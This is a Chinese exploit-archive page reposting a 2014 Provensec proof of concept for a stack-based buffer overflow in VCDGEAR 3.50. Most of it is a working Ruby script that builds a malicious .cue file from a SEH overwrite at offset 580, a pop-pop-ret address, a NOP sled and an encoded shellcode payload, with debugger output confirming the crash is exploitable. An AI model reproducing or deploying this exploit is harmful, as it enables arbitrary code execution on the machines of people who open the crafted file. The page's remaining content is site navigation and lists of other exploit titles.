首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VCDGEAR 3.50 Stack Buffer Overflow Vulnerability
来源:www.provensec.com 作者:Sacco 发布时间:2014-03-03  
# Author: Provensec www.provensec.com <advisories@provensec.com >
# Tested on XP SP3 / Windows 7
  
# Description: VCDGEAR 3.50 is prone to a stack-based buffer overflow
vulnerability because the application fails to perform adequate
boundary-checks on user-supplied input.
# An attacker can exploit this issue to execute arbitrary code in the
context of the application. Failed exploit attempts will result in a
denial-of-service condition.
# Application vendor: VCDGear 3.50 -
http://www.vcdgear.com/files/vcdgear350.zip
  
# 0x00499a1e : pop ecx # pop ebp # ret 0x0c | startnull {PAGE_EXECUTE_READ}
[vcdgear.exe]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
# SEH record (nseh field) at 0x0012f7a4 overwritten with normal pattern :
0x35744134 (offset 580), followed by 1416 bytes of cyclic data
# Project1!ScandataFinalize+0x441:
# 00452ff9 c6841553fdffff00 mov     byte ptr [ebp+edx-2ADh],0
ss:0023:4112f660=??
# 0:000> !exchain
# 0012f7a4: 44434241
# Invalid exception stack at 909006eb
# 0:000> !exploitable
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols
for C:\WINDOWS\system32\USER32.dll -
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols
for C:\WINDOWS\system32\kernel32.dll -
# Exploitability Classification: EXPLOITABLE
  
shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4" +
"\x0d\x2b\xba\x83\xeb\xfc\xe2\xf4\x58\xe5\x6f\xba\xa4\x0d\xa0\xff" +
"\x98\x86\x57\xbf\xdc\x0c\xc4\x31\xeb\x15\xa0\xe5\x84\x0c\xc0\xf3" +
"\x2f\x39\xa0\xbb\x4a\x3c\xeb\x23\x08\x89\xeb\xce\xa3\xcc\xe1\xb7" +
"\xa5\xcf\xc0\x4e\x9f\x59\x0f\xbe\xd1\xe8\xa0\xe5\x80\x0c\xc0\xdc" +
"\x2f\x01\x60\x31\xfb\x11\x2a\x51\x2f\x11\xa0\xbb\x4f\x84\x77\x9e" +
"\xa0\xce\x1a\x7a\xc0\x86\x6b\x8a\x21\xcd\x53\xb6\x2f\x4d\x27\x31" +
"\xd4\x11\x86\x31\xcc\x05\xc0\xb3\x2f\x8d\x9b\xba\xa4\x0d\xa0\xd2" +
"\x98\x52\x1a\x4c\xc4\x5b\xa2\x42\x27\xcd\x50\xea\xcc\xfd\xa1\xbe" +
"\xfb\x65\xb3\x44\x2e\x03\x7c\x45\x43\x6e\x4a\xd6\xc7\x0d\x2b\xba"
  
filename = "file.cue"
header = " BINARY\n"
header += " TRACK 01 MODE2\2352\n"
header += " INDEX 01 00:00:00\n"
  
nops = "\x90" * 20
junk = "\x41" * 324
nseh = "\xeb\x06\x90\x90"
seh = "\x1e\x9a\x49\x00"
padding = "D" * (1412-(nops.length+shellcode.length))
  
data = "FILE \"" + junk + nseh + "ABCD" + nops + shellcode + padding + "\""
+ header
  
puts "[*] JUNK size: %i\n" % [junk.length]
puts "[*] SHELLCODE size: %i\n" % [shellcode.length]
puts "[*] PADDING size: %i" % [padding.length]
  
File.open(filename, 'wb') do |fd|
  fd.write data
  puts "[*] FILE CREATED SUCCESSFULLY"
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Music AlarmClock 2.1.0 - (.m3u
·Total Video Player 1.3.1 (Sett
·GoldMP4Player 3.3 - Buffer Ove
·GE Proficy CIMPLICITY gefebt.e
·GoldMP4Player Buffer Overflow
·Kloxo Remote Root Exploit
·GoAhead Web Server 3.1.x - Den
·Symantec Endpoint Protection M
·VCDGear 3.50 (.cue) - Stack Bu
·Python socket.recvfrom_into()
·ALLPlayer 5.8.1 - (.m3u file)
·Embedthis Goahead 3.1.3-0 Deni
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved